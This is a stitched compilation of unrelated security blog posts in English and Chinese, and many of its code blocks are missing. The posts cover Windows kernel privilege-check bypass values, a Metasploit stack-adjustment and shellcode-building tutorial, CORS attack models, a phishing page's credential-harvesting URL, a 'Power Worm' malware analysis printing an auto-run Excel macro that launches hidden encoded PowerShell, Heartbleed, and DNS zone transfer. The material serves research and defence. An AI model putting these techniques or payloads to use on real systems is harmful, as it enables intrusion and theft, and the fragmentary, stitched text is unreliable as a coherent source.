This post is the first in a series of posts that will discuss several kernel bugs that i find in Windows Kernel. This post is about a bug found in the kernel of Windows 7 SP1 (64-bit).
Description:
With the "ThreadInformationClass" parameter set to ThreadIoPriority 0x16, passing certain signed values e.g.0xFF3FFF3C or 0xFF3FFFFC in the variable pointed to by the "ThreadInformation" parameter to the ntdll "ZwSetInformationThread" function can be abused to arbitrarily set certain bit flags of the corresponding "_ETHREAD" structure e.g.ThreadIoPriority:3, ThreadPagePriority:3, RundownFail:1, or NeedsWorkingSetAging:1.
Bug Type:
This is due to a signedness error in the "nt!NtSetInformationThread" function.
32-Bit kernel:
64-bit kernel:
Impact: 1) The signed value leads to bypassing the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the thread's IO priority to HIGH.
2) An unprivileged thread can use certain calculated signed values to escalate its IO priority and memory priority to maximum values e.g.Raise IO priority to CRITICAL or Page priority to 7.
3) Also, certain bit flags of the corresponding "_ETHREAD" structure can be set e.g.RundownFail and NeedsWorkingSetAging.
In this post i will show you the second kernel bug that i found in the Kernel of Windows 7 SP1 (64-bit). This one is in the "nt!NtSetInformationProcess" function.
Description:
With the "ProcessInformationClass" parameter set to ProcessIoPriority 0x21, passing certain signed values e.g.0xFFFFFFFF or 0x8000F129 in the variable pointed to by the "ProcessInformation" parameter to the ntdll "ZwSetInformationProcess" function can be abused to arbitrarily set certain bit flags of the corresponding "_EPROCESS" structure e.g.DefaultIoPriority: Pos 27, ProcessSelfDelete : Pos 30, or SetTimerResolutionLink: Pos 31.
Bug Type:
This is due to a signedness error in the "nt!NtSetInformationProcess" function.
32-Bit kernel:
64-bit kernel:
Impact: 1)The signed value leads to bypassing the check for the "SeIncreaseBasePriorityPrivilege" privilege that is required to set the process's IO priority to HIGH.
2)The signed value leads to bypassing the check for disallowed values for the process's IO priority e.g. the bug can be abused to set the process's IO priority to CRITICAL.
3) Setting the "ProcessSelfDelete" flag, which makes the target process non-killable by conventional methods.
4) Setting the "SetTimerResolutionLink" flag, which causes a BSOD (Bug check code of 0x3B) if we terminate the process due to a null pointer dereference bug.
When you are developing an exploit and you have very limited space for your payload you might need to adjust the stack to be able to use staged exploits. The problem, in case of a multi-stage payload, is that when the first stage that you send in your exploit payload starts to download the second stage, the stack pointer (ESP) might point to a place which is not far enough from the first stage in the memory; hence, the second stage might corrupt the code that you are executing. Stack adjustment is a technique that tries to solve this problem by setting the ESP to create more space for the second stage.
There is an easy solution for that which is really straight forward in metasploit. In your exploit you can set the ‘StackAdjustment’ attribute of the payload. Our simple example will be the ‘attftp_long_filename’ exploit with with the ‘windows/meterpreter/reverse_nonx_tcp’ payload. As you can see in the [MSF]/msf3/modules/exploits/windows/tftp/attftp_long_filename.rb it is set to -3500. That will subtract 3500 from the ESP just before executing the payload to make enough space for the second stage. In my case the question was, how to do the same without metasploit.
It is actually not that difficult but I wanted to write about it just for the record. As a PoC I implemented the same exploit in python using the same payload, but I will focus here on creating the payload. Our goal will be to create a payload with the following structure:
NOPsled + StackAdjustment + shellcode
Lets start from behind.
Shellcode
I used the ‘msfpayload’ to generate the first stage of the payload and save it in a file in raw format. I intentionally didn’t encode it at the beginning because I wanted to encode it together with the StackAdjustment, otherwise it wouldn’t fit in the available space. So first let’s generate the payload:
Then let’s see how to do the StackAdjustment. We will subtract 3500 from the ESP, that will make enough space for the second stage payload. To do that the ‘sub esp, 0xDAC’ command has to be executed on the target. We can find out the opcode with the nasm_shell.rb tool of metasploit;
root@bt:/opt/metasploit/msf3# ./tools/nasm_shell.rb
nasm > sub esp, 0xDAC
00000000 81ECAC0D0000 sub esp,0xdac
The happy marriage with encoding
We need to put this opcode before the msf payload and of course it has to be encoded because there are too many 0x00 characters. To do this I just catted together the opcode and the payload and piped it into the msfencode:
It was important to encode them together otherwise it would not fit in the 223 byte space available in the exploit.
NOPsled
The NOPsled can be easily created with metasploit, since the encoded shellcode is 210 bytes and we need to fill 223 bytes, we need to generate a 13 bytes long NOPsled:
msf > use nop/x86/opty2
msf nop(opty2) > generate -h
Usage: generate [options] length
Generates a NOP sled of a given length.
OPTIONS:
-b <opt> The list of characters to avoid: '\x00\xff'
-h Help banner.
-s <opt> The comma separated list of registers to save.
-t <opt> The output type: ruby, perl, c, or raw.
msf nop(opty2) > generate -b '\x00\xff' 13
buf =
"\x48\x4f\x2d\x25\xbb\x66\xba\x3d\x47\x41\x2f\xd6\xfd"
Putting everything together
In my exploit, I simply concatenated everything together:
The important takeaway here is how to adjust your stack manually if for some reason you can’t use metasploit. It is not difficult you just need to get your hands a bit dirty with bytes and hex.
I am preparing myself for the Hacktivity conference in Budapest, where I am gonna talk about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I will summarise my thoughts in a couple of blog posts.
To start off with I will describe the potential attackers who could try to use CORS in their attacks and I will build an attacker model.
First let’s look at the architecture where CORS is relevant.
CORS: attack environment
It can be seen on the picture that the attacker has control of at least one server. Of course this server could be in the internal network, however, this way the model is more general. The target can be either in the intranet or in the Internet, which brings us to the first differentiation point: the attacker’s knowledge about the internal network.
1) Knowledge
Internal attacker
Here the Internal attacker means that he has knowledge about the internal network and services, but it doesn’t mean necessarily that he is in the internal network. A good example is an ex-employee, who knows how to interact with the internal service and has great chances to do social engineering, however, he has no access to the internal network anymore.
External attacker
The attacker has no knowledge about the internal network. In this case he could either attack services on the Internet, to which he has access, and he is able to create attacks. He can also create attacks to get to know the internal network to find well known software (i.e., open source project used by the company) which he can analyse off-line.
2) Location
Although the attacker could be local, but he would have better options then using CORS, so I would generally consider a remote attacker. As shown on the architecture the attacker has control at least over one server on the Internet. This server can be his own, then he needs to trick the user to visit it, or it can be a compromised server, which he could use to inject his own code for instance through an XSS. There are enough vulnerable servers on the Internet so this is a good option as well.
3) Goal
The goal of the attacker is either to steal information from the target servers, to which he doesn’t have access, or manipulate these applications in a way that can help him in further attacks. When attacking a service on the Internet his goal might be to use the target user’s authenticated session to steal data. In case of the internal target the most important goal is to get access to the target services at all.
4) Summary
To finish the analysis, using the above described attributes a potential attack could be for example the following:
I was preparing myself for the Hacktivity conference in Budapest, where I talked about the security of the Cross-Origin Resource Sharing (CORS). As part of the preparation I summarised my thoughts in a couple of blog posts. This is one of them.
As a follow up of my previous post, I would like to continue with the short analysis of the threats and attack scenarios which could exploit CORS.
There are a few things to consider here. First, that CORS is not broken. It is just a feature that can support other already existing attacks to exploit other vulnerabilities. From penetration tester point of view CORS is rather a tool, then a vulnerability. Second, the most important property in CORS is that it allows you some kind of pass through the same-origin policy with a handful of limitations.
First let’s see the possible attacks from three different perspectives:
Goal of the attack
Target’s location
Type of attack
1) Goal of the attack
To start off with, it is worth to understand what kind of goals can an attacker have in mind.
Exploit Cross-Site Request Forgery
The most critical problem that an attacker can exploit with CORS is the Cross-Site Request Forgery(CSRF). The main reason for that is that, with CORS the attacker can send a complex set of requests to the server even with session cookies. For instance before CORS it was a bit difficult to order a product as the CSRF attack if the order process was multistage. In that case the attacker had to submit multiple forms to send the correct requests, however, with CORS it is possible to implement the whole attack in JavaScript and when the user loads the attacker’s malicious website the JavaScript can immediately start to send requests to the target.
Another important aspect is the file upload CSRF. I have already written about that here, so I won’t go into details, however, the point is that before CORS it was not possible to upload files through CSRF because of the ‘filename’ attribute in the request. But now it is possible because JavaScript can be used to build the request.
Interact with the internal network
If the user loads the attacker’s website in the company network, that essentially means that the attacker can execute code in the internal network. Of course some pretty strong limitations apply, which I will describe in the ‘Limitations’ part. So in this case the attacker can use CORS to try to explore the network, find well known service, try to do simple scanning etc.., or simply attack a known internal service which he has no access to.
2) Target’s location
Another important aspect of attacks is the location of the target. Here when we say ‘target’, then the target service is meant, so not the user who loads the malicious content but the service, which the hacker wants to attack through CORS.
Attacking services on the Internet
This is pretty straightforward. The attacker wants to attack a service which runs publicly on the Internet, however, he wants to access some restricted content, or he wants to do it in the name of somebody else. He can setup a malicious page, trick the user to load it and when he does, the page can interact with the target service from the user’s browser. An (imaginary) example would be the following: let’s assume that Facebook has a CSRF vulnerability in the share functionality. When the innocent user opens the malicious website, the JavaScript on it send a request to Facebook to share something (which complies with the attacker’s goal) on the user’s wall. Because of CORS the JavaScript can do that and with the ‘withcredentials’ XmlHttpRequest attribute the script can access the authenticated session of the user.
Attacking internal services
In the second part the attacker uses CORS and the user’s browser as a pivot point to get access to the internal (company) network. When the user loads the attacker’s malicious page the JavaScript will be able to access services, which are not accessible for the attacker from the Internet.
3) Direct vs Indirect
Direct attack against services
I wanted to mention this case, because it might seem trivial, but still there are many people doing such mistakes because they misunderstand CORS. So the problem is that some people considers CORS as some kind of authorization mechanism. This is coming from the fact that if you send an XmlHttpRequest and the server rejects your CORS the response data will be not available for the JavaScript. What they forget is that the data is still sent to the client and the browser decides based on the response’s Allow-Origin-* headers whether to allow it to the JavaScript or not. Unfortunately this solutions fails terribly when the client happens to be a script or a netcat running in the terminal. So when I write direct attack, I mean that the attacker connects directly to the service and not through the browser of some other user.
Indirect attacks
The indirect attacks are the traditional client side attacks, when the malicious code is injected in a website, that has to be loaded by the user. When the page is loaded the malicious code attacks the target service from the user’s client.
4) Limitations
As mentioned before there are pretty strong limitations when using CORS.
Write only requests
Often when the service is well configured or not configured at all, the response will not be readable for the JavaScript. For instance if the HTTP response has no Access-Control-Allow-Origin header, then , although all data were sent to the client, the JavaScript will not be able to access it. This means that requests can be sent to the server and the requested actions will be executed (hence the write only), but the JavaScript won’t be able to read the responses. This will stop the attacker to first request a form on the website to read the CSRF-protection-token and then submit the form with the token, because it won’t be able to read the response.
withCredentials vs. Access-Control-Allow-Origin: *
This is an interesting limitation which is actually quite smart. If you send a request with credentials and the server responds with Access-Control-Allow-Origin: *, which allows every domain, then you will not see the response content from JavaScript. The reason is that the ‘withCredentials’ cannot be used if all origins are allowed. This is the last line of defense against CSRF. If you could read the response, that would break the 99% of CSRF protections, because you could first load a page with you credentials, steal the CSRF token, then do a CSRF with the token.
5) Summary
Although these different perspectives are a little redundant, but all the different attack scenarios can be built from the combination of them.
Since this is only my quick analysis, if you have other ideas to the topic let me know.
As I mentioned in the CORS: Attack scenarios and the CORS: Attacker Model posts, I held the presentation about the security of CORS at the Hacktivity conference in Budapest. The presentation slides can be downloaded from here. If you have any questions to the topic, then let me know.
I have been asked to review Joe Stanco’s Build a Network Application with Node video tutorial. So let’s see.
Format
So first of all let’s see what you get. This is a Node.js video tutorial. To get a glimpse you can watch the example chapter on Youtube, here. From the format point of view, you get a web UI to watch the videos, which you can either do on-line or off-line. For instance I was watching it on the train to Vienna, so it works very well off-line. The tutorial is organized in 1-3 minutes videos. This can be useful if you want to revisit a topic later, however, it is a bit annoying when you watch it for the first time. The only problem is that the next video is not loaded automatically, hence you always have to minimise the video, click the next chapter and then click play. This is still ok, but it could be better.
Content
I won’t copy-paste the TOC, you can find it here. I think the covered topics are pretty goodm if you are a beginner in Node. The videos are also quiet good, very few slides, mostly code, terminal, and browser which fits to my taste :), however the code is not written in live, but copy-pasted which makes it for me and bit more difficult to follow, because I had to pause the video often to actually have time to read through the inserted code. It is at least better then, if it would be too slow and you have to wait for the video. Another annoying thing, in the UI, is that you cannot pause the video with the spacebar (which I think should be default for every media player).
Regarding the topics, as a rule-of-thumb you could say that for every mentioned topic it explained how to install, configure it, and one example is shown. If you already have this experience with any of the topic, you probably won’t learn anything new.
The narrator, to be honest I don’t know whether it is Joe Stanco or not, speaks clearly. The script of the course is clearly well prepared which has advantages and disadvantages. Good part is that is really clear and exact, bad is that it lacks fun and humour and most things are only defined exactly once. Which means if you don’t understand something from one sentence then you won’t have another chance. But this also makes the course shorter and not redundant.
Although the course doesn’t include exercises, the code of the examples are available, so you can try them out and play with them.
Security
Since I work in security I must take that in consideration as well. The course doesn’t talk about security at all, which makes me a bit sad. Of course you could say that this is not an advanced course and IT security is more complicated than that, however in my opinion security should be discussed on every level, at least so that the reader will be aware of the threats and that he has to deal with security. I think most of the people who will take this tutorial will start to write applications without taking any advanced course where security would be discussed, thus, they will be probably writing insecure applications as long as they get hacked or somebody tells them to take security seriously. That is why I think that no introductory course should exist without mentioning security.
Pros
Topics are good.
Example code is available.
Faster way to get to know Node, then reading a book.
Script is well written.
More code, less slides.
Explanations are mostly clear.
Cons
No automatic jump to next video.
No pause on spacebar.
Everything explained only once.
No excercises.
SECURITY IS NOT DISCUSSED.
Summary
I think this is a good course if you already know JavaScript but you are new to Node.js. Have fun with it if you decide to take it.
In this this post, i will share with you a tiny tool that i wrote to discover all occurrences of TimeDateStamps in a PE executable. The tool simply traverses the PE header and specifically the following structures/fields:
1) The "TimeDateStamp" field of the "_IMAGE_FILE_HEADER" structure.
This is the most notorious field that is always a target for both malware authors and forensic guys.
N.B. Certain versions of Delphi linkers always emit a fixed TimeDateStamp of 0x2A425E19, Sat Jun 20 01:22:17 1992. In this case you should not rely on this field and continue looking in other fields.
2) The "TimeDateStamp" field of the "_IMAGE_EXPORT_DIRECTORY" structure.
It is usually the same as or very close to the "TimeDateStamp" field of the the "_IMAGE_FILE_HEADER" structure".
N.B. Not all linkers fill this field, but Microsoft Visual Studio linkers do fill it for both DLL's and EXE's.
3) The "TimeDateStamp" field of the "_IMAGE_IMPORT_DESCRIPTOR" structure.
Unlike what the name implies, this field is a bit useless if you are trying to determine when the executable was built. It is -1 if the executable/dll is bound (see #8) and zero if not. So, it is not implemented in my tool.
4) The "TimeDateStamp" field of the "_IMAGE_RESOURCE_DIRECTORY" structure.
Usually Microsoft Visual Studio linkers don't set it (I have tested with linker versions of 6.0, 8.0, 9.0, and 10.0).
Borland C and Delphi set this field for the main _IMAGE_RESOURCE_DIRECTORY and its subdirectories.
Sometimes spoofers forget to forge this field for subdirectories.
5) The "TimeDateStamp" of the "_IMAGE_DEBUG_DIRECTORY" structures.
Microsoft Visual Studio linkers emitting debug info. in the final PE always set this field. Spoofers may forge the field in the first "_IMAGE_DEBUG_DIRECTORY" structure and forget the following ones.
N.B. Debug info as pointed to by Debug Data Directory is an array of "_IMAGE_DEBUG_DIRECTORY" structures, each representing debug info of different type e.g. COFF, CodeView, etc.
6) If "_IMAGE_DEBUG_DIRECTORY" has the "Type" field set to 0x2 (IMAGE_DEBUG_TYPE_CODEVIEW), then by following the "PointerToRawData" field we can find another occurrence of TimeDateStamp ( only if the PDB format is PDB 2.0 i.e when "Signature" field is set to "NB10" )
7) The "TimeDateStamp" field of the "_IMAGE_LOAD_CONFIG_DIRECTORY" structure.
I have not seen it being used before. However, it is implemented in the tool.
8) The "TimeDateStamp" field of the "_IMAGE_BOUND_IMPORT_DESCRIPTOR" structures.
It is the TimeDateStamp of the DLL that the executable is bound to. We can't use this field to know when the executable was build, but we can use it to determine on which Windows version/Service pack the file was built/bound. It is not implemented in the tool.
The tool has a very simple command line. See below.
You download the tool from here. For any bugs or suggestions, please don't hesitate to leave me a comment or contant me @waleedassar.
駭客間的戰爭已經不只是個人對個人,而已經擴大成國家對國家。一個國家為了獲取他國的機密文件、情報、個人資料等,都會想盡各種辦法入侵帳號、寄送惡意郵件、釣魚盜取密碼等。而身為受害者的我們能做什麼呢?Google 官方提出的建議是:加強密碼安全、注意登入 IP 位址、更新自己使用的軟體、開啟二階段驗證。當然有良好的資安意識才是更重要的。
正好今天收到一個簡單的案例,提供給各位參考。
在信箱中躺著一封很像是國外客戶的信件「Company Profile / Order Details」。內容看起來也很正常,並且附上了公司的基本資料為附加檔案。
點開附件,會發現畫面先跳了 JavaScript 警告視窗後,隨即導向到 Google 登入頁面。
注意看,這個登入頁面是真的嗎?有沒有發現畫面上的「Stay signed in」前面的勾變成方框了?瀏覽器上的網址也是在本機的位址。想想看,怎麼可能點了附件之後,跳轉到 Google 登入畫面?
讓我們看一下原始碼,會發現他的 form 被改成一個奇怪的網址,看起來就是惡意網站。其餘網頁的部份都是從 Google 真實的登入頁面抓取下來修改的。因此只要一不注意,就會以為是真的 Google 登入畫面而輸入帳號密碼。
節錄部分 code 如下:
發現了嗎?其中 form 的 action 欄位被取代成「http://cantonfair.a78.org/yahoo/post.php」,而這個頁面會直接接收受害者輸入的帳號密碼,並且自動跳轉到真正的 Google 登入頁面。攻擊者從 a78.org 這個網站中直接取得所有被駭的人輸入的帳號密碼。
不隨便開啟附加檔案:附件常夾帶惡意程式、執行檔、惡意文件、釣魚網頁等,切勿隨便開啟。可使用 Google Docs 開啟附件文件防止惡意文件攻擊 Adobe PDF Reader、Microsoft Office 等程式。更常有把惡意程式加密壓縮後寄出,在信中附上密碼,借此規避防毒軟體的偵測,不可不慎。
On March 27, 2014, Trend Micro revealed the so called “Power Worm” PowerShell-based malware that is actively being used in the wild. With so few publicly reported instances of PowerShell malware in existence, I was excited to get my hands on this most recent strain of PowerShell-based malware. Unable to track it down on my own, I reached out to the security and PowerShell communities. It was with great relief that my friend Lee Holmes – PowerShell developer extraordinaire and author of the Windows PowerShell Cookbook kindly provided me with all of the samples described in the Trend Micro post.
While the Trend Micro post was thorough in its coverage of the broader capabilities of the malware, they did not provide an analysis of its implementation which, as a PowerShell enthusiast and malware analyst, I was very interested in. That said, what follows is my analysis of the mechanics of the Office document infecting malware. Since there were multiple payloads associated with “Power Worm.” I decided to focus on the X97M_CRIGENT.A payload – a malicious Excel spreadsheet.
The targeted Excel macro used in the "Power Worm" campaign
The spreadsheet contains the following macro:
Private Sub Workbook_Open() b = "JwBDAEkREDACTEDREDACTED" _ & "QA7ACcAcgREDACTEDREDACTED" _ & "BzACgAKQAREDACTEDREDACTED" _ & "jAGUAIAAtREDACTEDREDACTED" _ & "ACAAUwB5AREDACTEDREDACTED" _ & "GcALgBpAGREDACTEDREDACTED" _ & "4AIAAtAGEREDACTEDREDACTED" _ & "AdAAuAHAAREDACTEDREDACTED" Set a = CreateObject("WScript.Shell") a.Run "powershell.exe" & " -noexit -encodedcommand " & b, 0, False End Sub
People have asked, “Wouldn’t the PowerShell execution policy potentially mitigate this attack?” No. First of all, the execution policy should not be viewed as a security mitigation considering PowerShell itself provides the mechanism to bypass it. Second, the execution policy is not honored when a Base64 encoded command is provided to the ‘-EncodedCommand’ parameter. Malware authors know this and will never run into a situation where the execution policy is the reason their malicious PowerShell code was prevented from executing. Having macros disabled by default prevents the initial infection, but all it takes is a naïve victim to click a single button to enable macros.
The ‘Workbook_Open’ function will execute automatically upon opening an Excel spreadsheet (assuming macros are allowed to execute). After decoding the Base64-encoded PowerShell command, you will be presented with an obfuscated mess consisting of the following:
The payload is a single line of semicolon delimited PowerShell commands.
Junk strings that have no impact on the script are inserted between each command.
All variables and function names are randomly generated and have no logical meaning.
Lastly, some functions used in the script are not implemented until a subsequent payload is downloaded from the command and control (C2) server.
I rewrote all of the “Power Worm” malware (redacting key portions) that I was able to obtain so that those interested don’t have to be bogged down with difficult to understand obfuscated code. I also created a PowerWorm GitHub repo where you will find the following code:
The rewritten X97M_CRIGENT.A PowerShell payloads (5 parts in total)
Test-PowerWormInfection – Detects and removes a “Power Worm” infection
Get-ExcelMacro – Outputs and removes Excel spreadsheet macros
Get-WordMacro – Outputs and removes Word document macros
As soon as the macro executes and launches PowerShell, the following code is executed:
Suppress error messages.
Obtain the machine GUID with WMI. This unique value specific to your system is used throughout the malware as a directory name to store downloaded files, registry key names where additional payload are persisted, and as a unique identifier for the C2 server.
Next, If the malware is already persistent in the registry, don’t bother running the payload again. It will execute again at next reboot.
Define a function to resolve DNS TXT records and download and decompress a zip file located at the URI in the resolved TXT record. Both Tor and Polipo are downloaded via this function.
Mark the downloaded file directory as hidden.
The next portion of the payload executes tor and polipo, a requirement for communicating with the C2 server and downloads and executes the next stage of the attack:
For those unfamiliar with common malware techniques, what should be worrisome about the fact that additional PowerShell code is downloaded and executed is that the malware authors have complete control over the downloaded content. The analysis that follows describes the instance of the malware that I downloaded. The malware authors could very well change the payload at any time.
The downloaded payload starts by persisting three additional Base64-encoded payloads to the registry.
The Trend Micro article neglected to mention the two payloads saved in the registry at the following locations:
$EncodedPayload1 and $EncodedPayload2 are essentially equivalent to the initial payload included in the Excel macro – they serve to reinfect the system and download/execute any additional payloads. $EncodedPayload3 contains all the logic to infect Office documents.
The malware then collects information about the compromised system and uploads it to the C2 server.
Finally, the Office document infection functions are called and if an additional payload is available, it is executed. I was unable to retrieve the additional payload during my analysis.
The Office document infection payload implements the following functions:
Start-NewDriveInfection – Registers a WMI event that detects when a new drive is added (e.g. USB thumb drive) and infects all Office documents present on the drive
Invoke-OfficeDocInfection – Infects all Office documents on the drive letter specified
Start-ExistingDriveInfection – Registers a FileSystemWatcher event to detect and infect newly created Office documents
Set-OfficeDocPayload – Adds a macro to the specified Office document
New-MaliciousMacroPayload – Generates a macro based upon one of the payloads present in the registry
Set-ExcelDocumentMacroPayload – Infects an Excel spreadsheet
Set-WordDocumentMacroPayload – Infects a Word document
In order to programmatically create/modify/remove Excel and Word macros, macro security must be disabled in the registry with these commands:
After the registry values are set, you will no longer be prompted to enable macros. They will execute automatically without your knowledge. Also, be mindful that if a macro is present in an Office document and you attempt to analyze it with the Word.Application and Excel.Application COM objects, the macro security settings are not honored and the macro will execute without your permission. Before opening an Office document with the COM objects, you must explicitly disallow the execution of macros by setting the ‘AutomationSecurity’ property to ‘msoAutomationSecurityForceDisable’.
The Word document infector is implemented as follows:
What’s interesting is that once the macro is written to the Word document, it is downgraded to a ‘macro-enabled’ .doc file.
Once a document or spreadsheet is infected, it will download and execute another PowerShell payload. I was unable to successfully download any additional payloads during my analysis. Either I was not emulating C2 communication properly or the payload was not made available at the time.
So in the end, I was rather impressed by the effectiveness of which the PowerShell payloads infected Office documents. It has yet to be seen though the true power of this malware until additional malicious payloads can be downloaded from the C2 server.
Should you become the victim of a “Power Worm” infection or any malicious Office document for that matter, I’ve provided tools to detect and remove “Power Worm” and Word/Excel macros. You can download these tools from my Github repo.
A missing bounds check in the handling of the TLS heartbeat extension can be
used to reveal up to 64k of memory to a connected client or server.
Only 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including
1.0.1f and 1.0.2-beta1.
怎樣的站台會是重點目標呢?含有會員機制的網站特別如此,例如 Web Mail、社群網站等等。因此不少企業要多注意了,例如全世界最大的社群網站 Facebook、SlideShare、台灣知名電信公司網站、社交平台、網路銀行、NAS,都會在這波的攻擊範圍之內。如果沒有儘速修復,等到更有效的攻擊程式出現,就真的等著失血了。
小結
就連 OpenSSL 這種歷史悠久而且重要的函式庫,都可能犯這種基本的 C 語言程式設計錯誤,老舊的程式碼一定有不少陳年遺毒,如果沒有徹底清查,類似的心臟噴血事件會不斷上演。大家快點止血吧!
The U.S. National Security Agency knew for at least two years about a flaw in the way that many websites send sensitive information, now dubbed the Heartbleed bug, and regularly used it to gather critical intelligence, two people familiar with the matter said.
廠商的設備目前狀況特別嚴重,因為所有同個版本的設備都會受影響,而在廠商釋出更新之前,只能被動的等待更新。若沒有繼續簽訂維護約的設備,也只能繼續跟廠商簽約更新,或者是看廠商是否可以直接提供更新檔。如果有 VPN Server 等服務更要注意,如果被攻擊者取得帳號密碼,等於如入無人之境,直接使用你的帳號登入到企業內網,不可不慎。
各家系統更新的速度?
引述自好朋友 Ant 的文章,各家作業系統、網站的更新速度,代表著企業重視資安的程度以及針對資安事件緊急應變的效率,也可以作為我們挑選系統、網站、廠商的依據。
Yesterday, I gave two presentations at the PowerShell Summit. The first presentation was on advanced eventing techniques in PowerShell and the second was on using PowerShell as a reverse engineering tool. As it turns out, PowerShell is an awesome tool for automating the analysis of .NET malware samples. I’ve included the slides for each talk. Additionally, you can download all of my demo code here. Just be mindful that this is all PoC code so it’s not in a well-polished state. Note: I provided the MD5 hashes of the malware samples but I won’t be providing a direct download link for them. Enjoy!
As a security professional, attending the PowerShell Summit is a great opportunity for me to meet and mingle with those outside of the security field as it forces me to get out of my security bubble and gain a completely different perspective from a wide range of IT pros and developers who are using PowerShell for completely non-malicious purposes ;)! Not to mention, getting to pick the brains of Microsoft employees like Jeffrey Snover, Lee Holmes, Jason Shirk, and Joe Bialek is humbling to say the least.
DNS 是在 1983 年由 Paul Mockapetris 所發明,相關規範分別在 RFC 1034 以及 RFC 1035。其主要作用是用來記憶 IP 位址與英文之間的對應關係,讓人類可以用較簡單的方式記得主機名稱。目前一般民眾大多使用 ISP 或國際知名公司提供的 DNS server,如中華的 168.95.1.1 或是 Google 的 8.8.8.8 等等。
然而對於企業而言,可能需要架設大量機器或內部系統,又希望以簡單的方式記憶主機名稱,因此許多企業有自行架設 DNS server 的需求。同時企業通常也會建立幾台備援 DNS server,以避免 DNS 服務忽然中斷。但是當企業有多台 DNS server 時,就必須考量 DNS 記錄的同步問題,通常會使用 zone transfer 這個功能來同步記錄。
然而若管理者未做好相關設定,使所有來源皆可對企業的 DNS 主機進行 zone transfer 查詢,則有機會讓此功能成為企業遭受攻擊的起點。用現實生活情境舉例的話,對外開放 zone transfer 就如同所有人都可以任意查詢你名下的所有房地產位在何處,假如有人要針對性的攻擊你,隨時都可以去看你某個房地產有沒有哪扇門窗沒關好,伺機入侵你的家園。一般我們對企業資訊系統進行滲透測試時,在資訊搜集的階段也會先從 domain name 下手,因此 DNS 相關資料的重要性可見一斑。
Zone transfer 的資安議題早在 1999 年就已有人提出,理應成為各企業進行資安稽核的步驟之一。然而十五年過去了,在近期我們卻發現許多國內大企業仍有此問題,令人非常驚訝!究竟企業該如何檢測自身是否存在這種安全漏洞?此問題目前在台灣網路環境佔有多大的比例?Zone transfer 會對企業造成什麼影響?讓我們繼續看下去~
如同上次 HTTP Headers 資安議題所探討的對象,我們從 TIEA 成員以及 Alexa TW top 525 觀察 zone transfer 問題分別在這些族群中佔有多少比例。
根據我們監測的結果,在目前 TIEA 的 132 名成員中,有 20 個網域存在 zone transfer 問題,佔了 15.15%。而在 Alexa TW top 525 當中,有 48 個網域存在 zone transfer 問題,佔了 9.14%。乍看之下比率似乎不高,但是在上述兩個族群的網域當中,包括:
電信商
多家電視媒體
多家網路新聞媒體
多家線上購物網站
知名團購網站
知名金流公司
知名線上音樂服務
台灣企業不夠注重資訊安全,罔顧客戶資料安全性,早已不是新聞。然而若企業不顧自身商業利益與責任,當彼此無商業往來時,我們也無法一一咎責。但若連台北市政府、教育部、多間大專院校都有此問題,就令人不太能接受了,這些政府單位與教育機構理當為我們的個人資料安全性負起全部的責任,不應該漏掉任何一個資安環節。上述結果顯示出台灣從政府到企業可能都沒有徹底落實 DNS 的資安設定,而且目前的數據僅僅是針對 TIEA 成員以及 Alexa TW top 525 進行檢測,若是對全台灣或是全世界進行大範圍的檢測,恐怕會發現更多驚人的案例!
對企業的潛在影響
洩漏網域名稱
一般企業在進行滲透測試時,通常只會挑幾個最重要、最常面對客戶的網域進行測試,但是入侵者可不會這麼乖。當有人嘗試要入侵企業時,必定是先進行全面的偵查,觀察企業哪幾個網域所執行的 service 有潛在的弱點,或是看哪幾個網域防禦力道較弱,再從該處下手。因此 zone transfer 問題所提供的完整 DNS 記錄,就為入侵者省下了許多偵查的工夫。
洩漏外網 IP 範圍
當攻擊者取得 zone transfer 所洩漏的資料後,可合理推斷哪些網段是屬於該企業,進一步對該網段進行掃描,嘗試找尋有機會入侵之標的物。
洩漏內網 IP 範圍
有些管理人員、開發者為求內部開發方便,經常會將網域名稱跟內網 IP 位址綁在一起,例如將 phpmyadmin.example.com 設定為 192.168.1.100,攻擊者就可根據此類資訊猜測內網哪些網段存在重要服務。這種設定平常也許不會造成重大損害,但是當管理者疏於建立內網防禦機制,恰好企業又被入侵至內網時,造成一連串重大損失的機率將會大幅提高。
解決方式
Linux
若使用 Linux,可在 /etc/named.conf 內加入下列選項,以限制可存取 zone transfer 的來源:
DNS 在做 zone transfer 時是使用 TCP 53 port(有別於一般 DNS query 的 UDP 53 port),因此有些人會認為將 TCP 53 port 關閉就可以對付 zone transfer,而不想修改 zone transfer 的設定。其實這個觀念只對了一半,若 zone file 的資料小於 512 byte,仍然可以透過 UDP 傳輸。即使 zone file 的資料大於 512 byte,也可以用 Incremental Zone Transfer (IXFR) 的方式取得部分資料。
結論
如果企業今天非常有自信能夠替所有網域都準備好完善的安全措施,那麼 zone transfer 所洩漏的資料對該企業就不會有太嚴重的影響。然而,在現今這個入侵手法日新月異的世界裡,又有誰能夠永遠保證自己的安全防護已經做足了呢?在前陣子火紅的 OpenSSL CVE-2014-0160 Heartbleed 問題被爆出來之後,我們就藉由許多 zone transfer 的記錄觀察到全世界有非常多企業只修復了主要網站的 OpenSSL 漏洞,卻忽略了企業內其他的服務與設備可能也有此漏洞,像是 DB、Email、VPN、NAS 等等,直到今日仍遲遲未修復。
我們可以用一個譬喻來表示:你加入了一個秘密俱樂部,填寫完會員資料後,得到了一張會員卡。之後只要憑這張會員卡,就可以進入這個俱樂部。但是隔天,你的會員卡掉了。撿走你會員卡的人,就可以用你的會員卡進入這個秘密俱樂部,因為會員卡上沒有你的照片或是其他足以辨識身分的資訊。這就像是一個會員網站,我們申請了一個帳號(填寫會員資料加入俱樂部),輸入帳號密碼登入之後,得到一組 Cookie,其中有 Session ID 來辨識你的身分(透過會員卡來辨識身分)。今天如果 Cookie 被偷走了(會員卡被撿走了),別人就可以用你的帳號來登入網站(別人用你的會員卡進入俱樂部)。
Session 攻擊手法有三種:
猜測 Session ID (Session Prediction)
竊取 Session ID (Session Hijacking)
固定 Session ID (Session Fixation)
我們以下一一介紹。
Session Prediction (猜測 Session ID)
Session ID 如同我們前面所說的,就如同是會員卡的編號。只要知道 Session ID,就可以成為這個使用者。如果 Session ID 的長度、複雜度、雜亂度不夠,就能夠被攻擊者猜測。攻擊者只要寫程式不斷暴力計算 Session ID,就有機會得到有效的 Session ID 而竊取使用者帳號。
